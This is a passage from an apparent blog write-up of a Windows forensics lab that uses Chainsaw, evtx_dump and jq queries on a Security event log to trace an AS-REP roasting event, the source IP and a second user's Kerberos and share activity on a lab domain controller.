&#9608;&#9608;&#9553;     &#9608;&#9608;&#9556;&#9552;&#9552;&#9608;&#9608;&#9553;&#9608;&#9608;&#9556;&#9552;&#9552;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553;&#9562;&#9608;&#9608;&#9559;&#9608;&#9608;&#9553;&#9562;&#9552;&#9552;&#9552;&#9552;&#9608;&#9608;&#9553;&#9608;&#9608;&#9556;&#9552;&#9552;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553;&#9608;&#9608;&#9608;&#9559;&#9608;&#9608;&#9553;
&#9562;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9559;&#9608;&#9608;&#9553;  &#9608;&#9608;&#9553;&#9608;&#9608;&#9553;  &#9608;&#9608;&#9553;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553; &#9562;&#9608;&#9608;&#9608;&#9608;&#9553;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553;  &#9608;&#9608;&#9553;&#9562;&#9608;&#9608;&#9608;&#9556;&#9608;&#9608;&#9608;&#9556;&#9565;
 &#9562;&#9552;&#9552;&#9552;&#9552;&#9552;&#9565;&#9562;&#9552;&#9565;  &#9562;&#9552;&#9565;&#9562;&#9552;&#9565;  &#9562;&#9552;&#9565;&#9562;&#9552;&#9565;&#9562;&#9552;&#9565;  &#9562;&#9552;&#9552;&#9552;&#9565;&#9562;&#9552;&#9552;&#9552;&#9552;&#9552;&#9552;&#9565;&#9562;&#9552;&#9565;  &#9562;&#9552;&#9565; &#9562;&#9552;&#9552;&#9565;&#9562;&#9552;&#9552;&#9565;
    By WithSecure Countercept (@FranticTyping, @AlexKornitzer)

[+] Loading detection rules from:
[!] Loaded 3448 detection rules (508 not loaded)
[+] Loading forensic artefacts from: Security.evtx (extensions: .evt, .evtx)
[+] Loaded 1 forensic artefacts (1.1 MiB)
[+] Current Artifact: Security.evtx
[+] Hunting [========================================] 1/1   [00:00:00]                                                                                                                                                                      
[+] Group: Sigma                                                                                                                                                                                                                             
&#9484;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9488;
&#9474;      timestamp      &#9474;        detections         &#9474; count &#9474;     Event.System.Provider      &#9474; Event ID &#9474; Record ID &#9474;     Computer      &#9474;           Event Data           &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2024-05-29 06:35:09 &#9474; &#8227; Scheduled Task Deletion &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4699     &#9474; 6225      &#9474; DC01.forela.local &#9474; TaskContent: ''                &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                   &#9474; FQDN: DC01.forela.local        &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; SubjectDomainName: FORELA      &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; ClientProcessId: 4448          &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; SubjectUserSid: S-1-5-21-32394 &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; 15629-1862073780-2394361899-50 &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; 0                              &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; TaskName: \CreateExplorerShell &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; UnelevatedTask                 &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; ClientProcessStartKey: 3096224 &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; 743817332                      &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; SubjectLogonId: '0x54484'      &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; SubjectUserName: Administrator &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; ParentProcessId: 5520          &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; RpcCallClientLocality: 0       &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2024-05-29 06:35:09 &#9474; &#8227; Rare Schtasks Creations &#9474; 2     &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474;                                &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2024-05-29 06:39:54 &#9474; &#8227; Scheduled Task Deletion &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4699     &#9474; 6304      &#9474; DC01.forela.local &#9474; TaskContent: ''                &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                   &#9474; FQDN: DC01.forela.local        &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; SubjectDomainName: FORELA      &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; ClientProcessId: 5212          &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; SubjectUserSid: S-1-5-21-32394 &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; 15629-1862073780-2394361899-50 &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; 0                              &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; TaskName: \CreateExplorerShell &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; UnelevatedTask                 &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; ClientProcessStartKey: 3377699 &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; 720527986                      &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; SubjectLogonId: '0x52c5a'      &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; SubjectUserName: Administrator &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; ParentProcessId: 2600          &#9474;
&#9474;                     &#9474;                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                   &#9474; RpcCallClientLocality: 0       &#9474;
&#9492;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9496;

[+] 3 Detections found on 3 documents</code></pre></div><p>Here we got domain and Administrator SID:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">DC01.forela.local  </code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">S-1-5-21-3239415629-1862073780-2394361899-500</code></pre></div><p>Let&#8217;s convert it to JSON file:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo evtx_dump -o jsonl -t 1 -f Security.json Security.evtx 
                                                                                                                                                                                                                                             
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ll          
total 1248
-rw-r--r-- 1 root root 1118208 May 29  2024 Security.evtx
-rw-r--r-- 1 root root  158868 Feb 28 15:36 Security.json</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ wc -l Security.json
152 Security.json</code></pre></div><p>When you open it it&#8217;s LONG, use JQ later on!</p><p>Okay now let&#8217;s look-up for 2 main question regarding AS-REP roast, to be catching it faster we Know AS-REP roast Event id is 4768:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Oj0S!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba9026e6-9555-470f-978b-ecf60ab76419_1461x552.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Oj0S!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba9026e6-9555-470f-978b-ecf60ab76419_1461x552.png 424w, https://substackcdn.com/image/fetch/$s_!Oj0S!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba9026e6-9555-470f-978b-ecf60ab76419_1461x552.png 848w, https://substackcdn.com/image/fetch/$s_!Oj0S!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba9026e6-9555-470f-978b-ecf60ab76419_1461x552.png 1272w, https://substackcdn.com/image/fetch/$s_!Oj0S!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba9026e6-9555-470f-978b-ecf60ab76419_1461x552.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Oj0S!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba9026e6-9555-470f-978b-ecf60ab76419_1461x552.png" width="1456" height="550" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ba9026e6-9555-470f-978b-ecf60ab76419_1461x552.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:550,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:188105,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189471558?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba9026e6-9555-470f-978b-ecf60ab76419_1461x552.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Oj0S!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba9026e6-9555-470f-978b-ecf60ab76419_1461x552.png 424w, https://substackcdn.com/image/fetch/$s_!Oj0S!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba9026e6-9555-470f-978b-ecf60ab76419_1461x552.png 848w, https://substackcdn.com/image/fetch/$s_!Oj0S!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba9026e6-9555-470f-978b-ecf60ab76419_1461x552.png 1272w, https://substackcdn.com/image/fetch/$s_!Oj0S!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba9026e6-9555-470f-978b-ecf60ab76419_1461x552.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Which we have several:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat Security.json | jq . | grep 4768
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,
      "EventID": 4768,</code></pre></div><p>Let&#8217;s filter for PreAuth</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat Security.json | jq . | grep PreAuth
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "0",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",
      "PreAuthType": "2",</code></pre></div><p>Dope, as we here there&#8217;s multiple PreAuthType, and only one of them are labeled &#8220;0&#8220;, which there&#8217;s an Activity related to AS-REP roast there.</p><p>PS: PreAuthType as 0 means there&#8217;s no Pre-Authentication, meaning that Event ID lines could answer Number 1,2, and 3.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat Security.json | jq '.Event | select(.EventData.PreAuthType =="0")'
{
  "#attributes": {
    "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
  },
  "System": {
    "Provider": {
      "#attributes": {
        "Name": "Microsoft-Windows-Security-Auditing",
        "Guid": "54849625-5478-4994-A5BA-3E3B0328C30D"
      }
    },
    "EventID": 4768,
    "Version": 0,
    "Level": 0,
    "Task": 14339,
    "Opcode": 0,
    "Keywords": "0x8020000000000000",
    "TimeCreated": {
      "#attributes": {
        "SystemTime": "2024-05-29T06:36:40.246362Z"
      }
    },
    "EventRecordID": 6241,
    "Correlation": null,
    "Execution": {
      "#attributes": {
        "ProcessID": 752,
        "ThreadID": 3188
      }
    },
    "Channel": "Security",
    "Computer": "DC01.forela.local",
    "Security": null
  },
  "EventData": {
    "TargetUserName": "arthur.kyle",
    "TargetDomainName": "forela.local",
    "TargetSid": "S-1-5-21-3239415629-1862073780-2394361899-1601",
    "ServiceName": "krbtgt",
    "ServiceSid": "S-1-5-21-3239415629-1862073780-2394361899-502",
    "TicketOptions": "0x40800010",
    "Status": "0x0",
    "TicketEncryptionType": "0x17",
    "PreAuthType": "0",
    "IpAddress": "::ffff:172.17.79.129",
    "IpPort": "61965",
    "CertIssuerName": "",
    "CertSerialNumber": "",
    "CertThumbprint": ""
  }
}</code></pre></div><p>Dope!</p><p>Next we&#8217;re asked for IP Address, if we&#8217;re just filtering the whole JSON file, we got multiple IP:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat Security.json | jq . | grep IpAddress                             
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "172.17.79.4",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "fe80::35a9:2032:4461:eefa",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "fe80::35a9:2032:4461:eefa",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::ffff:172.17.79.129",
      "IpAddress": "::ffff:172.17.79.129",
      "IpAddress": "172.17.79.129",
      "IpAddress": "172.17.79.129",
      "IpAddress": "172.17.79.129",
      "IpAddress": "172.17.79.129",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "172.17.79.4",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "fe80::35a9:2032:4461:eefa",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "::1",
      "IpAddress": "fe80::35a9:2032:4461:eefa",</code></pre></div><p>Which is dope and reduces some effort.</p><p>And we can just, re-use the earlier filters and Add the IP address of that Event:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat Security.json | jq '.Event | select(.EventData.PreAuthType =="0") | .EventData.IpAddress'   
"::ffff:172.17.79.129"</code></pre></div><p>The IPv4 is: 172.17.79.129</p><p>Amazing!</p><p>Lastly we&#8217;re asked another Kerberos related, focused on the DC which we&#8217;re looking for logon.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat Security.json | grep 172.17.79.129 | jq .Event.System.EventID 
4768
4769
5140
5140
5140
5140</code></pre></div><p>Oh yeah, 4769 meaning 1 point higher than the AS-REP roast earlier could be key finding, event ID of 5140 can also being an indication when network share object was used.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat Security.json | grep 172.17.79.129 | jq . | grep TargetUserName
      "TargetUserName": "arthur.kyle",
      "TargetUserName": "happy.grunwald@FORELA.LOCAL",</code></pre></div><p>Great, we found another User.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat Security.json | jq '. | select(.Event.System.EventID == 4769)' | grep happy.grunwald
      "TargetUserName": "happy.grunwald@FORELA.LOCAL",
                                                                                                                                                                                                                                             
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat Security.json | jq '. | select(.Event.System.EventID == 5140)' | grep happy.grunwald
      "SubjectUserName": "happy.grunwald",
      "SubjectUserName": "happy.grunwald",
